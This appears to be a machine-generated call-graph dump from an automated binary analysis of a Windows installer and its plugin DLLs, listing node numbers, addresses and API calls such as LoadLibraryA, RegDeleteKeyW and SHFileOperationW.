6117->6111 6118 4065b1 GlobalFree 6117->6118 6120 4065c7 LoadLibraryA 6118->6120 6121 406709 FreeLibrary 6118->6121 6124 4064d6 6119->6124 6127 406621 6119->6127 6120->6111 6123 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6120->6123 6121->6111 6122 40667d FreeLibrary 6131 406656 6122->6131 6123->6127 6125 4064fa FreeLibrary GlobalFree 6124->6125 6124->6127 6133 406516 6124->6133 6125->6111 6126 406716 6130 40671b CloseHandle FreeLibrary 6126->6130 6127->6122 6127->6131 6128 406528 lstrcpyW OpenProcess 6129 40657b CloseHandle CharUpperW lstrcmpW 6128->6129 6128->6133 6129->6127 6129->6133 6132 406730 CloseHandle 6130->6132 6131->6126 6134 4066b1 lstrcmpW 6131->6134 6135 4066e2 CloseHandle 6131->6135 6136 406700 CloseHandle 6131->6136 6132->6130 6133->6118 6133->6128 6133->6129 6134->6131 6134->6132 6135->6131 6136->6121 6137->6108 6138->6112 6139 6ffb1c74 6142 6ffb1c49 6139->6142 6143 6ffb2025 2 API calls 6142->6143 6144 6ffb1c4e 6143->6144 6145 4044d1 6146 40450b 6145->6146 6147 40453e 6145->6147 6213 405cb0 GetDlgItemTextW 6146->6213 6148 40454b GetDlgItem GetAsyncKeyState 6147->6148 6156 4045dd 6147->6156 6150 40456a GetDlgItem 6148->6150 6164 404588 6148->6164 6153 403d6b 19 API calls 6150->6153 6151 4046c9 6155 40485f 6151->6155 6215 405cb0 GetDlgItemTextW 6151->6215 6152 404516 6154 406064 5 API calls 6152->6154 6159 40457d ShowWindow 6153->6159 6157 40451c 6154->6157 6163 403df6 8 API calls 6155->6163 6156->6151 6156->6155 6162 406831 18 API calls 6156->6162 6160 403ea0 5 API calls 6157->6160 6159->6164 6165 404521 GetDlgItem 6160->6165 6161 4046f5 6166 4067aa 18 API calls 6161->6166 6167 40465b SHBrowseForFolderW 6162->6167 6168 404873 6163->6168 6169 4045a5 SetWindowTextW 6164->6169 6174 405d85 4 API calls 6164->6174 6165->6155 6170 40452f IsDlgButtonChecked 6165->6170 6172 4046fb 6166->6172 6167->6151 6173 404673 CoTaskMemFree 6167->6173 6171 403d6b 19 API calls 6169->6171 6170->6147 6175 4045c3 6171->6175 6216 406035 lstrcpynW 6172->6216 6176 40674e 3 API calls 6173->6176 6177 40459b 6174->6177 6178 403d6b 19 API calls 6175->6178 6179 404680 6176->6179 6177->6169 6181 40674e 3 API calls 6177->6181 6182 4045ce 6178->6182 6183 4046b7 SetDlgItemTextW 6179->6183 6188 406831 18 API calls 6179->6188 6181->6169 6214 403dc4 SendMessageW 6182->6214 6183->6151 6184 404712 6186 406328 3 API calls 6184->6186 6196 40471a 6186->6196 6187 4045d6 6189 406328 3 API calls 6187->6189 6190 40469f lstrcmpiW 6188->6190 6189->6156 6190->6183 6193 4046b0 lstrcatW 6190->6193 6191 40475c 6217 406035 lstrcpynW 6191->6217 6193->6183 6194 404765 6195 405d85 4 API calls 6194->6195 6197 40476b GetDiskFreeSpaceW 6195->6197 6196->6191 6199 40677d 2 API calls 6196->6199 6201 4047b1 6196->6201 6200 40478f MulDiv 6197->6200 6197->6201 6199->6196 6200->6201 6202 40480e 6201->6202 6218 4043d9 6201->6218 6204 404831 6202->6204 6205 40141d 80 API calls 6202->6205 6226 403db1 EnableWindow 6204->6226 6205->6204 6206 4047ff 6208 404810 SetDlgItemTextW 6206->6208 6209 404804 6206->6209 6208->6202 6211 4043d9 21 API calls 6209->6211 6210 40484d 6210->6155 6227 403d8d 6210->6227 6211->6202 6213->6152 6214->6187 6215->6161 6216->6184 6217->6194 6219 4043f9 6218->6219 6220 406831 18 API calls 6219->6220 6221 404439 6220->6221 6222 406831 18 API calls 6221->6222 6223 404444 6222->6223 6224 406831 18 API calls 6223->6224 6225 404454 lstrlenW wsprintfW SetDlgItemTextW 6224->6225 6225->6206 6226->6210 6228 403da0 SendMessageW 6227->6228 6229 403d9b 6227->6229 6228->6155 6229->6228 6230 401dd3 6231 401446 18 API calls 6230->6231 6232 401dda 6231->6232 6233 401446 18 API calls 6232->6233 6234 4018d3 6233->6234 5863 402e55 5864 40145c 18 API calls 5863->5864 5865 402e63 5864->5865 5866 402e79 5865->5866 5867 40145c 18 API calls 5865->5867 5868 405e5c 2 API calls 5866->5868 5867->5866 5869 402e7f 5868->5869 5893 405e7c GetFileAttributesW CreateFileW 5869->5893 5871 402e8c 5872 402f35 5871->5872 5873 402e98 GlobalAlloc 5871->5873 5876 4062cf 11 API calls 5872->5876 5874 402eb1 5873->5874 5875 402f2c CloseHandle 5873->5875 5894 403368 SetFilePointer 5874->5894 5875->5872 5878 402f45 5876->5878 5880 402f50 DeleteFileW 5878->5880 5881 402f63 5878->5881 5879 402eb7 5882 403336 ReadFile 5879->5882 5880->5881 5883 401435 25 API calls 5881->5883 5884 402ec0 GlobalAlloc 5882->5884 5889 402f69 5883->5889 5885 402ed0 5884->5885 5886 402f04 WriteFile GlobalFree 5884->5886 5888 40337f 33 API calls 5885->5888 5887 40337f 33 API calls 5886->5887 5890 402f29 5887->5890 5892 402edd 5888->5892 5890->5875 5891 402efb GlobalFree 5891->5886 5892->5891 5893->5871 5894->5879 6235 401cd5 6236 401446 18 API calls 6235->6236 6237 401cdd 6236->6237 6238 401446 18 API calls 6237->6238 6239 401ce8 6238->6239 6240 40145c 18 API calls 6239->6240 6241 401cf1 6240->6241 6242 401d07 lstrlenW 6241->6242 6243 401d43 6241->6243 6244 401d11 6242->6244 6244->6243 6248 406035 lstrcpynW 6244->6248 6246 401d2c 6246->6243 6247 401d39 lstrlenW 6246->6247 6247->6243 6248->6246 6249 6e9e1108 6250 6e9e1138 6249->6250 6251 6e9e15a3 3 API calls 6250->6251 6260 6e9e1146 6251->6260 6252 6e9e1203 GlobalFree 6253 6e9e1628 2 API calls 6253->6260 6254 6e9e11fe 6254->6252 6255 6e9e15a3 3 API calls 6255->6260 6256 6e9e15e0 2 API calls 6259 6e9e11ed GlobalFree 6256->6259 6257 6e9e1189 GlobalAlloc 6257->6260 6258 6e9e1223 GlobalFree 6258->6260 6259->6260 6260->6252 6260->6253 6260->6254 6260->6255 6260->6256 6260->6257 6260->6258 6261 6e9e164f lstrcpyW 6260->6261 6262 6e9e11cd GlobalFree 6261->6262 6262->6260 6263 402cd7 6264 401446 18 API calls 6263->6264 6267 402c64 6264->6267 6265 402d99 6266 402d17 ReadFile 6266->6267 6267->6263 6267->6265 6267->6266 6268 6ffb1c6c 6271 6ffb1c14 6268->6271 6272 6ffb2025 2 API calls 6271->6272 6273 6ffb1c1b 6272->6273 6274 6ffb2025 2 API calls 6273->6274 6275 6ffb1c22 IsWindow 6274->6275 6276 6ffb1c2f 6275->6276 6277 6ffb1c35 6275->6277 6278 6ffb13f8 GetPropW 6276->6278 6278->6277 6279 402dd8 6280 402ddf 6279->6280 6281 4030e3 6279->6281 6282 402de5 FindClose 6280->6282 6282->6281 6283 6ffb1b62 6284 6ffb2025 2 API calls 6283->6284 6285 6ffb1b68 IsWindow 6284->6285 6286 6ffb1b75 6285->6286 6287 6ffb13f8 GetPropW 6286->6287 6288 6ffb1b81 6287->6288 6289 6ffb1b93 6288->6289 6290 6ffb1e34 2 API calls 6288->6290 6290->6289 5895 401d5c 5896 40145c 18 API calls 5895->5896 5897 401d63 5896->5897 5898 40145c 18 API calls 5897->5898 5899 401d6c 5898->5899 5900 401d73 lstrcmpiW 5899->5900 5901 401d86 lstrcmpW 5899->5901 5902 401d79 5900->5902 5901->5902 5903 401c99 5901->5903 5902->5901 5902->5903 6291 6e9e1000 6292 6e9e1859 4 API calls 6291->6292 6293 6e9e1017 6292->6293 6294 6e9e101e GlobalAlloc 6293->6294 6295 6e9e101b 6293->6295 6294->6295 6296 6e9e1880 2 API calls 6295->6296 6297 6e9e102d 6296->6297 6298 6e9e2800 6299 6e9e282f 6298->6299 6300 6e9e1c1b 29 API calls 6299->6300 6301 6e9e2836 6300->6301 6302 6e9e283d 6301->6302 6303 6e9e2849 6301->6303 6304 6e9e15e0 2 API calls 6302->6304 6305 6e9e2853 6303->6305 6306 6e9e2870 6303->6306 6309 6e9e2847 6304->6309 6310 6e9e1880 2 API calls 6305->6310 6307 6e9e289a 6306->6307 6308 6e9e2876 6306->6308 6312 6e9e1880 2 API calls 6307->6312 6311 6e9e1904 2 API calls 6308->6311 6313 6e9e2858 6310->6313 6315 6e9e287b 6311->6315 6312->6309 6314 6e9e1904 2 API calls 6313->6314 6316 6e9e285e 6314->6316 6317 6e9e15e0 2 API calls 6315->6317 6318 6e9e15e0 2 API calls 6316->6318 6319 6e9e2881 GlobalFree 6317->6319 6320 6e9e2864 GlobalFree 6318->6320 6319->6309 6321 6e9e2895 GlobalFree 6319->6321 6320->6309 6321->6309 6325 4027e3 6326 4027e9 6325->6326 6327 4027f2 6326->6327 6328 402836 6326->6328 6341 401553 6327->6341 6330 40145c 18 API calls 6328->6330 6331 40283d 6330->6331 6333 4062cf 11 API calls 6331->6333 6332 4027f9 6334 40145c 18 API calls 6332->6334 6335 401a13 6332->6335 6336 40284d 6333->6336 6337 40280a RegDeleteValueW 6334->6337 6345 40149d RegOpenKeyExW 6336->6345 6339 4062cf 11 API calls 6337->6339 6340 40282a RegCloseKey 6339->6340 6340->6335 6342 401563 6341->6342 6343 40145c 18 API calls 6342->6343 6344 401589 RegOpenKeyExW 6343->6344 6344->6332 6349 4014c9 6345->6349 6353 401515 6345->6353 6346 4014ef RegEnumKeyW 6347 401501 RegCloseKey 6346->6347 6346->6349 6350 406328 3 API calls 6347->6350 6348 401526 RegCloseKey 6348->6353 6349->6346 6349->6347 6349->6348 6351 40149d 3 API calls 6349->6351 6352 401511 6350->6352 6351->6349 6352->6353 6354 401541 RegDeleteKeyW 6352->6354 6353->6335 6354->6353 6355 4040e4 6356 4040ff 6355->6356 6362 40422d 6355->6362 6358 40413a 6356->6358 6386 403ff6 WideCharToMultiByte 6356->6386 6357 404298 6359 40436a 6357->6359 6360 4042a2 GetDlgItem 6357->6360 6366 403d6b 19 API calls 6358->6366 6367 403df6 8 API calls 6359->6367 6363 40432b 6360->6363 6364 4042bc 6360->6364 6362->6357 6362->6359 6365 404267 GetDlgItem SendMessageW 6362->6365 6363->6359 6369 40433d 6363->6369 6364->6363 6368 4042e2 6 API calls 6364->6368 6391 403db1 EnableWindow 6365->6391 6371 40417a 6366->6371 6376 404365 6367->6376 6368->6363 6372 404353 6369->6372 6373 404343 SendMessageW 6369->6373 6375 403d6b 19 API calls 6371->6375 6372->6376 6377 404359 SendMessageW 6372->6377 6373->6372 6374 404293 6378 403d8d SendMessageW 6374->6378 6379 404187 CheckDlgButton 6375->6379 6377->6376 6378->6357 6389 403db1 EnableWindow 6379->6389 6381 4041a5 GetDlgItem 6390 403dc4 SendMessageW 6381->6390 6383 4041bb SendMessageW 6384 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 6383->6384 6385 4041d8 GetSysColor 6383->6385 6384->6376 6385->6384 6387 404033 6386->6387 6388 404015 GlobalAlloc WideCharToMultiByte 6386->6388 6387->6358 6388->6387 6389->6381 6390->6383 6391->6374 6392 402ae4 6393 4030e3 6392->6393 6394 402aeb 6392->6394 6395 402af2 CloseHandle 6394->6395 6395->6393 5904 402065 5905 401446 18 API calls 5904->5905 5906 40206d 5905->5906 5907 401446 18 API calls 5906->5907 5908 402076 GetDlgItem 5907->5908 5909 4030dc 5908->5909 5910 4030e3 5909->5910 5912 405f7d wsprintfW 5909->5912 5912->5910 5913 402665 5914 40145c 18 API calls 5913->5914 5915 40266b 5914->5915 5916 40145c 18 API calls 5915->5916 5917 402674 5916->5917 5918 40145c 18 API calls 5917->5918 5919 40267d 5918->5919 5920 4062cf 11 API calls 5919->5920 5921 40268c 5920->5921 5922 406301 2 API calls 5921->5922 5923 402695 5922->5923 5924 4026a6 lstrlenW lstrlenW 5923->5924 5926 404f9e 25 API calls 5923->5926 5928 4030e3 5923->5928 5925 404f9e 25 API calls 5924->5925 5927 4026e8 SHFileOperationW 5925->5927 5926->5923 5927->5923 5927->5928 6396 6ffb1c5c 6397 6ffb1c14 4 API calls 6396->6397 6398 6ffb1c63 6397->6398 5929 401c69 5930 40145c 18 API calls 5929->5930 5931 401c70 5930->5931 5932 4062cf 11 API calls 5931->5932 5933 401c80 5932->5933 5934 405ccc MessageBoxIndirectW 5933->5934 5935 401a13 5934->5935 5936 6ffb1bd7 5937 6ffb2025 2 API calls 5936->5937 5938 6ffb1bdd 5937->5938 5939 6ffb2025 2 API calls 5938->5939 5940 6ffb1be4 5939->5940 5941 6ffb1bff 5940->5941 5942 6ffb1bec SetTimer 5940->5942 5942->5941 5943 402f6e 5944 402f72 5943->5944 5945 402fae 5943->5945 5947 4062cf 11 API calls 5944->5947 5946 40145c 18 API calls 5945->5946 5951 402f9d 5946->5951 5948 402f7d 5947->5948 5949 4062cf 11 API calls 5948->5949 5950 402f90 5949->5950 5952 402fa2 5950->5952 5953 402f98 5950->5953 5955 406113 9 API calls 5952->5955 5954 403ea0 5 API calls 5953->5954 5954->5951 5955->5951 5396 4023f0 5397 402403 5396->5397 5398 4024da 5396->5398 5399 40145c 18 API calls 5397->5399 5400 404f9e 25 API calls 5398->5400 5401 40240a 5399->5401 5404 4024f1 5400->5404 5402 40145c 18 API calls 5401->5402 5403 402413 5402->5403 5405 402429 LoadLibraryExW 5403->5405 5406 40241b GetModuleHandleW 5403->5406 5407 40243e 5405->5407 5408 4024ce 5405->5408 5406->5405 5406->5407 5422 406391 GlobalAlloc WideCharToMultiByte 5407->5422 5410 404f9e 25 API calls 5408->5410 5410->5398 5411 402449 5412 40248c 5411->5412 5413 40244f 5411->5413 5414 404f9e 25 API calls 5412->5414 5415 402457 5413->5415 5416 40246e KiUserCallbackDispatcher 5413->5416 5418 402496 5414->5418 5425 401435 5415->5425 5417 40245f 5416->5417 5417->5404 5421 4024c0 FreeLibrary 5417->5421 5420 4062cf 11 API calls 5418->5420 5420->5417 5421->5404 5423 4063c9 GlobalFree 5422->5423 5424 4063bc GetProcAddress 5422->5424 5423->5411 5424->5423 5426 404f9e 25 API calls 5425->5426 5427 401443 5426->5427 5427->5417 5672 402175 5673 401446 18 API calls 5672->5673 5674 40217c 5673->5674 5675 401446 18 API calls 5674->5675 5676 402186 5675->5676 5677 402197 5676->5677 5678 4062cf 11 API calls 5676->5678 5679 4021aa EnableWindow 5677->5679 5680 40219f ShowWindow 5677->5680 5678->5677 5681 4030e3 5679->5681 5680->5681 5682 6e9e2728 5683 6e9e2738 VirtualProtect 5682->5683 5684 6e9e2773 5682->5684 5683->5684 6406 4048f8 6407 404906 6406->6407 6408 40491d 6406->6408 6409 40490c 6407->6409 6424 404986 6407->6424 6410 40492b IsWindowVisible 6408->6410 6416 404942 6408->6416 6411 403ddb SendMessageW 6409->6411 6413 404938 6410->6413 6410->6424 6414 404916 6411->6414 6412 40498c CallWindowProcW 6412->6414 6425 40487a SendMessageW 6413->6425 6416->6412 6430 406035 lstrcpynW 6416->6430 6418 404971 6431 405f7d wsprintfW 6418->6431 6420 404978 6421 40141d 80 API calls 6420->6421 6422 40497f 6421->6422 6432 406035 lstrcpynW 6422->6432 6424->6412 6426 4048d7 SendMessageW 6425->6426 6427 40489d GetMessagePos ScreenToClient SendMessageW 6425->6427 6429 4048cf 6426->6429 6428 4048d4 6427->6428 6427->6429 6428->6426 6429->6416 6430->6418 6431->6420 6432->6424 6433 6e9e1427 6434 6e9e143f 6433->6434 6435 6e9e18df 2 API calls 6434->6435 6436 6e9e145a 6435->6436 6437 4050f9 6438 4052c1 6437->6438 6439 40511a GetDlgItem GetDlgItem GetDlgItem 6437->6439 6441 4052f2 6438->6441 6442 4052ca GetDlgItem CreateThread CloseHandle 6438->6442 6486 403dc4 SendMessageW 6439->6486 6444 405320 6441->6444 6445 405342 6441->6445 6446 40530c ShowWindow ShowWindow 6441->6446 6442->6441 6443 40518e 6452 406831 18 API calls 6443->6452 6447 40537e 6444->6447 6450 405331 6444->6450 6451 405357 ShowWindow 6444->6451 6448 403df6 8 API calls 6445->6448 6488 403dc4 SendMessageW 6446->6488 6447->6445 6455 405389 SendMessageW 6447->6455 6461 4052ba 6448->6461 6456 403d44 SendMessageW 6450->6456 6453 405377 6451->6453 6454 405369 6451->6454 6457 4051ad 6452->6457 6459 403d44 SendMessageW 6453->6459 6458 404f9e 25 API calls 6454->6458 6460 4053a2 CreatePopupMenu 6455->6460 6455->6461 6456->6445 6462 4062cf 11 API calls 6457->6462 6458->6453 6459->6447 6463 406831 18 API calls 6460->6463 6464 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 6462->6464 6465 4053b2 AppendMenuW 6463->6465 6466 405203 SendMessageW SendMessageW 6464->6466 6467 40521f 6464->6467 6468 4053c5 GetWindowRect 6465->6468 6469 4053d8 6465->6469 6466->6467 6471 405232 6467->6471 6472 405224 SendMessageW 6467->6472 6470 4053df TrackPopupMenu 6468->6470 6469->6470 6470->6461 6473 4053fd 6470->6473 6474 403d6b 19 API calls 6471->6474 6472->6471 6475 405419 SendMessageW 6473->6475 6476 405242 6474->6476 6475->6475 6477 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 6475->6477 6478 40524b ShowWindow 6476->6478 6479 40527f GetDlgItem SendMessageW 6476->6479 6480 40545b SendMessageW 6477->6480 6482 405261 ShowWindow 6478->6482 6483 40526e 6478->6483 6479->6461 6481 4052a2 SendMessageW SendMessageW 6479->6481 6480->6480 6484 405486 GlobalUnlock SetClipboardData CloseClipboard 6480->6484 6481->6461 6482->6483 6487 403dc4 SendMessageW 6483->6487 6484->6461 6486->6443 6487->6479 6488->6444 6489 4020f9 GetDC GetDeviceCaps 6490 401446 18 API calls 6489->6490 6491 402116 MulDiv 6490->6491 6492 401446 18 API calls 6491->6492 6493 40212c 6492->6493 6494 406831 18 API calls 6493->6494 6495 402165 CreateFontIndirectW 6494->6495 6496 4030dc 6495->6496 6498 4030e3 6496->6498 6499 405f7d wsprintfW 6496->6499 6499->6498 6500 4024fb 6501 40145c 18 API calls 6500->6501 6502 402502 6501->6502 6503 40145c 18 API calls 6502->6503 6504 40250c 6503->6504 6505 40145c 18 API calls 6504->6505 6506 402515 6505->6506 6507 40145c 18 API calls 6506->6507 6508 40251f 6507->6508 6509 40145c 18 API calls 6508->6509 6510 402529 6509->6510 6511 40253d 6510->6511 6512 40145c 18 API calls 6510->6512 6513 4062cf 11 API calls 6511->6513 6512->6511 6514 40256a CoCreateInstance 6513->6514 6515 40258c 6514->6515 6516 4026fc 6517 401ee4 6516->6517 6519 402708 6516->6519 6517->6516 6518 406831 18 API calls 6517->6518 6518->6517 5711 4019fd 5712 40145c 18 API calls 5711->5712 5713 401a04 5712->5713 5714 405eab 2 API calls 5713->5714 5715 401a0b 5714->5715 6520 4022fd 6521 40145c 18 API calls 6520->6521 6522 402304 GetFileVersionInfoSizeW 6521->6522 6523 40232b GlobalAlloc 6522->6523 6525 4030e3 6522->6525 6524 40233f GetFileVersionInfoW 6523->6524 6523->6525 6526 402350 VerQueryValueW 6524->6526 6527 402381 GlobalFree 6524->6527 6526->6527 6528 402369 6526->6528 6527->6525 6533 405f7d wsprintfW 6528->6533 6531 402375 6534 405f7d wsprintfW 6531->6534 6533->6531 6534->6527 6535 402afd 6536 40145c 18 API calls 6535->6536 6537 402b04 6536->6537 6542 405e7c GetFileAttributesW CreateFileW 6537->6542 6539 402b10 6540 4030e3 6539->6540 6543 405f7d wsprintfW 6539->6543 6542->6539 6543->6540 6544 4029ff 6545 401553 19 API calls 6544->6545 6546 402a09 6545->6546 6547 40145c 18 API calls 6546->6547 6548 402a12 6547->6548 6549 402a1f RegQueryValueExW 6548->6549 6552 401a13 6548->6552 6550 4029e4 RegCloseKey 6549->6550 6551 402a3f 6549->6551 6550->6552 6551->6550 6555 405f7d wsprintfW 6551->6555 6555->6550 4656 401f80 4680 401446 4656->4680 4658 401f88 4659 401446 18 API calls 4658->4659 4660 401f93 4659->4660 4663 401fa3 4660->4663 4683 40145c 4660->4683 4662 401fb3 4665 402006 4662->4665 4666 401fbc 4662->4666 4663->4662 4664 40145c 18 API calls 4663->4664 4664->4662 4668 40145c 18 API calls 4665->4668 4667 401446 18 API calls 4666->4667 4669 401fc4 4667->4669 4670 40200d 4668->4670 4671 401446 18 API calls 4669->4671 4672 40145c 18 API calls 4670->4672 4673 401fce 4671->4673 4674 402016 FindWindowExW 4672->4674 4675 401ff6 SendMessageW 4673->4675 4676 401fd8 SendMessageTimeoutW 4673->4676 4678 402036 4674->4678 4675->4678 4676->4678 4677 4030e3 4678->4677 4688 405f7d wsprintfW 4678->4688 4689 406831 4680->4689 4682 401455 4682->4658 4684 406831 18 API calls 4683->4684 4685 401488 4684->4685 4686 401497 4685->4686 4687 406064 5 API calls 4685->4687 4686->4663 4687->4686 4688->4677 4703 40683e 4689->4703 4690 406aab 4691 406ac1 4690->4691 4723 406035 lstrcpynW 4690->4723 4691->4682 4693 4068ff GetVersion 4693->4703 4694 406a72 lstrlenW 4694->4703 4697 406831 10 API calls 4697->4694 4699 40697e GetSystemDirectoryW 4699->4703 4700 406991 GetWindowsDirectoryW 4700->4703 4702 4069c5 SHGetSpecialFolderLocation 4702->4703 4706 4069dd SHGetPathFromIDListW CoTaskMemFree 4702->4706 4703->4690 4703->4693 4703->4694 4703->4697 4703->4699 4703->4700 4703->4702 4704 406831 10 API calls 4703->4704 4705 406a0b lstrcatW 4703->4705 4707 405eff RegOpenKeyExW 4703->4707 4712 405f7d wsprintfW 4703->4712 4713 406035 lstrcpynW 4703->4713 4714 406064 4703->4714 4704->4703 4705->4703 4706->4703 4708 405f33 RegQueryValueExW 4707->4708 4709 405f78 4707->4709 4710 405f55 RegCloseKey 4708->4710 4709->4703 4710->4709 4712->4703 4713->4703 4721 406071 4714->4721 4715 4060e7 4716 4060ed CharPrevW 4715->4716 4718 40610d 4715->4718 4716->4715 4717 4060da CharNextW 4717->4715 4717->4721 4718->4703 4720 4060c6 CharNextW 4720->4721 4721->4715 4721->4717 4721->4720 4722 4060d5 CharNextW 4721->4722 4724 405d32 4721->4724 4722->4717 4723->4691 4725 405d38 4724->4725 4726 405d4e 4725->4726 4727 405d3f CharNextW 4725->4727 4726->4721 4727->4725 5956 401000 5957 401037 BeginPaint GetClientRect 5956->5957 5958 40100c DefWindowProcW 5956->5958 5960 4010fc 5957->5960 5963 401182 5958->5963 5961 401073 CreateBrushIndirect FillRect DeleteObject 5960->5961 5962 401105 5960->5962 5961->5960 5964 401170 EndPaint 5962->5964 5965 40110b CreateFontIndirectW 5962->5965 5964->5963 5965->5964 5966 40111b 6 API calls 5965->5966 5966->5964 6556 402880 6557 402884 6556->6557 6558 40145c 18 API calls 6557->6558 6559 4028a7 6558->6559 6560 40145c 18 API calls 6559->6560 6561 4028b1 6560->6561 6562 4028ba RegCreateKeyExW 6561->6562 6563 4029ef 6562->6563 6564 4028e8 6562->6564 6565 402934 6564->6565 6567 40145c 18 API calls 6564->6567 6566 402963 6565->6566 6568 401446 18 API calls 6565->6568 6569 4029ae RegSetValueExW 6566->6569 6572 40337f 33 API calls 6566->6572 6570 4028fc lstrlenW 6567->6570 6571 402947 6568->6571 6575 4029c6 RegCloseKey 6569->6575 6576 4029cb 6569->6576 6573 402918 6570->6573 6574 40292a 6570->6574 6578 4062cf 11 API calls 6571->6578 6579 40297b 6572->6579 6580 4062cf 11 API calls 6573->6580 6581 4062cf 11 API calls 6574->6581 6575->6563 6577 4062cf 11 API calls 6576->6577 6577->6575 6578->6566 6587 406250 6579->6587 6584 402922 6580->6584 6581->6565 6584->6569 6586 4062cf 11 API calls 6586->6584 6588 406273 6587->6588 6589 4062b6 6588->6589 6590 406288 wsprintfW 6588->6590 6591 402991 6589->6591 6592 4062bf lstrcatW 6589->6592 6590->6589 6590->6590 6591->6586 6592->6591 5967 403d02 5968 403d0d 5967->5968 5969 403d11 5968->5969 5970 403d14 GlobalAlloc 5968->5970 5970->5969 6593 402082 6594 401446 18 API calls 6593->6594 6595 402093 SetWindowLongW 6594->6595 6596 4030e3 6595->6596 6597 402a84 6598 401553 19 API calls 6597->6598 6599 402a8e 6598->6599 6600 401446 18 API calls 6599->6600 6601 402a98 6600->6601 6602 402ab2 RegEnumKeyW 6601->6602 6603 402abe RegEnumValueW 6601->6603 6604 401a13 6601->6604 6605 402a7e 6602->6605 6603->6604 6603->6605 6605->6604 6606 4029e4 RegCloseKey 6605->6606 6606->6604 5971 6ffb14b2 5972 6ffb13f8 GetPropW 5971->5972 5973 6ffb14bd 5972->5973 5974 6ffb14f8 5973->5974 5975 6ffb14e0 CallWindowProcW 5973->5975 5976 6ffb14c7 LoadCursorW SetCursor 5973->5976 5975->5974 5976->5974 6607 402c8a 6608 402ca2 6607->6608 6609 402c8f 6607->6609 6611 40145c 18 API calls 6608->6611 6610 401446 18 API calls 6609->6610 6613 402c97 6610->6613 6612 402ca9 lstrlenW 6611->6612 6612->6613 6614 401a13 6613->6614 6615 402ccb WriteFile 6613->6615 6615->6614 6616 401d8e 6617 40145c 18 API calls 6616->6617 6618 401d95 ExpandEnvironmentStringsW 6617->6618 6619 401da8 6618->6619 6621 401db9 6618->6621 6620 401dad lstrcmpW 6619->6620 6619->6621 6620->6621 5977 401e0f 5978 401446 18 API calls 5977->5978 5979 401e17 5978->5979 5980 401446 18 API calls 5979->5980 5981 401e21 5980->5981 5982 4030e3 5981->5982 5984 405f7d wsprintfW 5981->5984 5984->5982 6622 40438f 6623 4043c8 6622->6623 6624 40439f 6622->6624 6626 403df6 8 API calls 6623->6626 6625 403d6b 19 API calls 6624->6625 6627 4043ac SetDlgItemTextW 6625->6627 6628 4043d4 6626->6628 6627->6623 6629 403f90 6630 403fa0 6629->6630 6631 403fbc 6629->6631 6640 405cb0 GetDlgItemTextW 6630->6640 6632 403fc2 SHGetPathFromIDListW 6631->6632 6633 403fef 6631->6633 6635 403fd2 6632->6635 6639 403fd9 SendMessageW 6632->6639 6637 40141d 80 API calls 6635->6637 6636 403fad SendMessageW 6636->6631 6637->6639 6639->6633 6640->6636 5490 6e9e2a4f 5491 6e9e2a7f 5490->5491 5532 6e9e1c1b 5491->5532 5493 6e9e2a86 5494 6e9e2b9c 5493->5494 5495 6e9e2a9e 5493->5495 5496 6e9e2a97 5493->5496 5573 6e9e28a3 5495->5573 5592 6e9e23c1 5496->5592 5501 6e9e2ae4 5605 6e9e2445 5501->5605 5502 6e9e2b02 5505 6e9e2b08 5502->5505 5506 6e9e2b44 5502->5506 5503 6e9e2acd 5515 6e9e2ac3 5503->5515 5602 6e9e1507 5503->5602 5504 6e9e2ab4 5508 6e9e2aba 5504->5508 5514 6e9e2ac5 5504->5514 5510 6e9e1904 2 API calls 5505->5510 5512 6e9e2445 10 API calls 5506->5512 5508->5515 5586 6e9e124c 5508->5586 5517 6e9e2b1e 5510->5517 5523 6e9e2b36 5512->5523 5596 6e9e25b2 5514->5596 5515->5501 5515->5502 5520 6e9e2445 10 API calls 5517->5520 5519 6e9e2acb 5519->5515 5520->5523 5531 6e9e2b8b 5523->5531 5625 6e9e240b 5523->5625 5525 6e9e2b95 GlobalFree 5525->5494 5528 6e9e2b77 5528->5531 5629 6e9e1880 5528->5629 5529 6e9e2b70 FreeLibrary 5529->5528 5531->5494 5531->5525 5633 6e9e1581 GlobalAlloc 5532->5633 5534 6e9e1c3f 5634 6e9e1581 GlobalAlloc 5534->5634 5536 6e9e1c4a 5635 6e9e15a3 5536->5635 5538 6e9e1e60 GlobalFree GlobalFree GlobalFree 5539 6e9e1e7d 5538->5539 5556 6e9e1ec7 5538->5556 5544 6e9e21ad 5539->5544 5552 6e9e1e99 5539->5552 5539->5556 5540 6e9e1d04 GlobalAlloc 5565 6e9e1c52 5540->5565 5541 6e9e21ed GetModuleHandleW 5542 6e9e21fe LoadLibraryW 5541->5542 5543 6e9e220f lstrcmpiW 5541->5543 5542->5543 5542->5556 5547 6e9e222d 5543->5547 5548 6e9e2221 lstrcmpiW 5543->5548 5544->5541 5544->5556 5545 6e9e1d55 lstrcpyW 5549 6e9e1d5f lstrcpyW 5545->5549 5546 6e9e1d7a GlobalFree 5546->5565 5550 6e9e2296 5547->5550 5557 6e9e2257 lstrlenW 5547->5557 5548->5547 5548->5550 5549->5565 5647 6e9e194f WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5550->5647 5552->5556 5642 6e9e1592 5552->5642 5553 6e9e22a8 5555 6e9e22b8 lstrcpyW lstrcatW 5553->5555 5553->5556 5648 6e9e194f WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5555->5648 5556->5493 5563 6e9e2264 5557->5563 5564 6e9e2282 5557->5564 5560 6e9e216c lstrcpyW 5560->5565 5561 6e9e1dbc 5561->5565 5640 6e9e18df GlobalSize GlobalAlloc 5561->5640 5562 6e9e2019 GlobalFree 5562->5565 5563->5564 5572 6e9e2276 lstrcatW 5563->5572 5646 6e9e194f WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5564->5646 5565->5538 5565->5540 5565->5545 5565->5546 5565->5549 5565->5560 5565->5561 5565->5562 5569 6e9e1592 2 API calls 5565->5569 5645 6e9e1581 GlobalAlloc 5565->5645 5567 6e9e22f2 5567->5556 5571 6e9e2302 lstrcatW 5567->5571 5569->5565 5570 6e9e228e 5570->5556 5571->5556 5572->5564 5580 6e9e28bb 5573->5580 5574 6e9e1592 2 API calls 5574->5580 5575 6e9e15a3 3 API calls 5575->5580 5577 6e9e2a18 GlobalFree 5578 6e9e2a49 5577->5578 5577->5580 5578->5503 5578->5504 5578->5515 5579 6e9e29d0 